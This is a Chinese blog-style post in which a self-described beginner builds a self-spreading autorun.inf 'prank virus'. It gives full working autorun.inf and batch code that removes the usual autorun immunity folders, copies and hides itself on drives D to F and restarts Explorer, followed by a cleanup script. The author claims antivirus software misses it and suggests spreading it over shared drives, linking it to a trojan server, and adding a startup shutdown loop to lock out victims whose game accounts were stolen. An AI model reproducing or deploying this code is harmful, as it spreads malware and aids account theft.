最近电脑中了一个弱弱的病毒,貌似是一个比较流行的U盘病毒。突然想起以前接触过它的免疫手段,然后对其进行了一天的解析,将其修改一个弱弱的恶作剧病毒(其实不算是病毒,但是修改后能成为病毒。)它的名字相信很多人都熟悉,autorun.inf,当然,这个文件本身不是病毒,最初这个文件用于CD之类的软盘自动播放,并且,运用得当,可以修改自己的盘符特征,从而个性化自己的盘符。至于autorun.inf的原理大家可以去百度搜索,百度还有它的免疫手段,我破解了最常用的一种免疫手段,就是创建autorun.inf文件夹并内置畸形文件夹的手段(高手不要笑话,小手段而已)
首先创建一个记事本文件写入以下内容,
[AutoRun]
open=copy.bat
shellopen=打开(&O)
shellopenCommand=copy.bat
shellopenDefault=1
shellexplore=资源管理器(&X)
shellexploreCommand=copy.bat
并且将其改名为 autorun.inf(注意扩展名。)
然后在和 autorun.inf相同的目录下创建一个记事本文件写入以下内容,
@ECHO OFF
if not exist d:autorun.inf goto :copy
rd d:autorun.inf /s/q
rd e:autorun.inf /s/q
rd f:autorun.inf /s/q
:copy
if exist d:autorun.inf goto :eof
copy autorun.inf d:
copy copy.bat d:
copy autorun.inf e:
copy copy.bat e:
copy autorun.inf f:
copy copy.bat f:
attrib d:autorun.inf +h +a +r +s
attrib d:copy.bat +h +a +r +s
attrib e:autorun.inf +h +a +r +s
attrib e:copy.bat +h +a +r +s
attrib f:autorun.inf +h +a +r +s
attrib f:copy.bat +h +a +r +s
TASKKILL.exe /im explorer.exe /f
START %windir%explorer.exe
将文件重命名为copy.bat,运行之后,你的电脑就被感染了,D,E,F盘将会打不开(高手当然有办法打开)。
这里我并没有将病毒传染到C盘,而且只写到了F盘,可以根据自己需要修改。
然后就是解毒代码。同样创建一个记事本文件,写入以下内容
@echo off
attrib d:autorun.inf -h -a -r -s
attrib d:copy.bat -h -a -r -s
attrib e:autorun.inf -h -a -r -s
attrib e:copy.bat -h -a -r -s
attrib f:autorun.inf -h -a -r -s
attrib f:copy.bat -h -a -r -s
del d:copy.bat
del d:autorun.inf
del e:copy.bat
del e:autorun.inf
del f:copy.bat
del f:autorun.inf
TASKKILL.exe /im explorer.exe /f
START %windir%explorer.exe
将其重命名为 XXX.bat 运行,就会将这个小恶作剧给删除掉。
应为只考虑了做个小恶作剧病毒,所以并没有对电脑进行实际上的操作,这里只是用一般的手段打不开盘符而已,并没有做木马之类的动作,也没有修改注册表。只牵扯到了简单的MS-DOS批处理手段,所以杀毒软件是感觉不出来的。
若是经过修改,可以通过共享盘符使对方电脑感染,可以连接木马服务端,(其实,我想到了一个让电脑不断关机的方法,就是将其添加到注册表启动项,然后调用 shutdown -s -t 0 ,那么电脑一开机马上就关机了。具体有什么用,大家可以想象以下,盗了别人的游戏账号,然而对方电脑却一直打不开。。。朋友曾经碰到过类似状况)
若是有人中了类似状况,改天有兴趣在全面解析一次autorun.inf病毒的原理。。
再次声明,本人新手,高手手下留情。。。。。。
登陆您的帐号 | 免费注册帐号